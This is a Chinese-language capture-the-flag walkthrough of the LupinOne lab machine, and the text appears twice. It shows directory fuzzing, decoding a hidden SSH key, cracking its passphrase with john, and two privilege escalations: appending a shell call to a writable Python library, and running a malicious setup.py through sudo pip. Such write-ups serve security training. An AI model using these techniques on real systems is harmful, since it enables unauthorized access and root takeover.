攻击机ip192.168.154.253靶机ip192.168.154.138靶机系统debian信息收集Goby扫描靶场ip是192.168.154.138查看网页一个图片没什么东西端口扫描目录扫描有一个txt文件比较可疑访问一下翻译为用户代理*禁止访问/~myfiles我就访问纯骗人继续爆目录想了一下是不是要和~myfiles一样前面加一个~试一下ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.154.138/~FUZZ -t 70果然爆出来了~secret打开看看翻译后你好朋友我很高兴你找到了我的秘密目录。我这样创建是为了与你分享我的SSH私钥文件。它隐藏在这里的某个地方这样黑客就找不到它也无法用fasttrack破解我的密码。我很聪明我知道这一点。有任何问题请告诉我。你最好的朋友 icex64得到三个线索1.目标主机存在用户icex64 2.ssh私钥文件还隐藏在目录之中 3.ssh密钥可以被fasttrack字典爆破爆破私钥文件ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.154.138/~secret/.FUZZ -t 70 -fs 280 -e .key,.txt访问一下http://192.168.154.138/~secret/.mysecret.txt在网上搜索了一下发现是base58编码解码后转存文件为passwd执行chmod 600 passwd标准私钥文件赋权限成功交互而后爆破解密用提示信息fasttrack爆破ssh2john passwd | tee key_hash #提取john key_hash --wordlist/usr/share/wordlists/fasttrack.txt #爆破爆破成功账号icex64密码P55w0rd!拿到第一个flag提权用sudo -l指令查看到了有一个py文件icex64 用户被授权无需密码以 arsene 用户的身份运行继续信息搜集翻译你能帮我检查一下我的代码是否安全可以运行吗我需要用它来进行下一次行动。我不希望其他任何人能够进入它因为这可能会危及我的账户并找到我的秘密文件。只有你有权限访问我的程序因为我知道你的账户是安全的。在另一头见。阿尔塞纳·卢平。查看一下python代码检查一下是否有python3.9和相关的包webbrowser ,其他用户有写的权限那很好办了劫持第三方库实现提权ls -liash /usr/lib/python3.9/ | grep webbrowser #查找echo os.system(/bin/bash) /usr/lib/python3.9/webbrowser.py #改包sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py执行heist.py,成功提升权限到arsene用户依然sudo -l查看相应权限使用情况发现arsene 可以 以 root超级用户身份 无密码执行pip命令那么就可以利用更进一步了提权辅助网站https://gtfobins.github.io/TF$(mktemp -d) # 创建临时目录echo import os; os.execl(/bin/sh, sh, -c, sh $(tty) $(tty) 2$(tty)) $TF/setup.pysudo pip install $TF #运行拿到第2个flag
LupinOne靶场渗透
攻击机ip192.168.154.253靶机ip192.168.154.138靶机系统debian信息收集Goby扫描靶场ip是192.168.154.138查看网页一个图片没什么东西端口扫描目录扫描有一个txt文件比较可疑访问一下翻译为用户代理*禁止访问/~myfiles我就访问纯骗人继续爆目录想了一下是不是要和~myfiles一样前面加一个~试一下ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.154.138/~FUZZ -t 70果然爆出来了~secret打开看看翻译后你好朋友我很高兴你找到了我的秘密目录。我这样创建是为了与你分享我的SSH私钥文件。它隐藏在这里的某个地方这样黑客就找不到它也无法用fasttrack破解我的密码。我很聪明我知道这一点。有任何问题请告诉我。你最好的朋友 icex64得到三个线索1.目标主机存在用户icex64 2.ssh私钥文件还隐藏在目录之中 3.ssh密钥可以被fasttrack字典爆破爆破私钥文件ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.154.138/~secret/.FUZZ -t 70 -fs 280 -e .key,.txt访问一下http://192.168.154.138/~secret/.mysecret.txt在网上搜索了一下发现是base58编码解码后转存文件为passwd执行chmod 600 passwd标准私钥文件赋权限成功交互而后爆破解密用提示信息fasttrack爆破ssh2john passwd | tee key_hash #提取john key_hash --wordlist/usr/share/wordlists/fasttrack.txt #爆破爆破成功账号icex64密码P55w0rd!拿到第一个flag提权用sudo -l指令查看到了有一个py文件icex64 用户被授权无需密码以 arsene 用户的身份运行继续信息搜集翻译你能帮我检查一下我的代码是否安全可以运行吗我需要用它来进行下一次行动。我不希望其他任何人能够进入它因为这可能会危及我的账户并找到我的秘密文件。只有你有权限访问我的程序因为我知道你的账户是安全的。在另一头见。阿尔塞纳·卢平。查看一下python代码检查一下是否有python3.9和相关的包webbrowser ,其他用户有写的权限那很好办了劫持第三方库实现提权ls -liash /usr/lib/python3.9/ | grep webbrowser #查找echo os.system(/bin/bash) /usr/lib/python3.9/webbrowser.py #改包sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py执行heist.py,成功提升权限到arsene用户依然sudo -l查看相应权限使用情况发现arsene 可以 以 root超级用户身份 无密码执行pip命令那么就可以利用更进一步了提权辅助网站https://gtfobins.github.io/TF$(mktemp -d) # 创建临时目录echo import os; os.execl(/bin/sh, sh, -c, sh $(tty) $(tty) 2$(tty)) $TF/setup.pysudo pip install $TF #运行拿到第2个flag
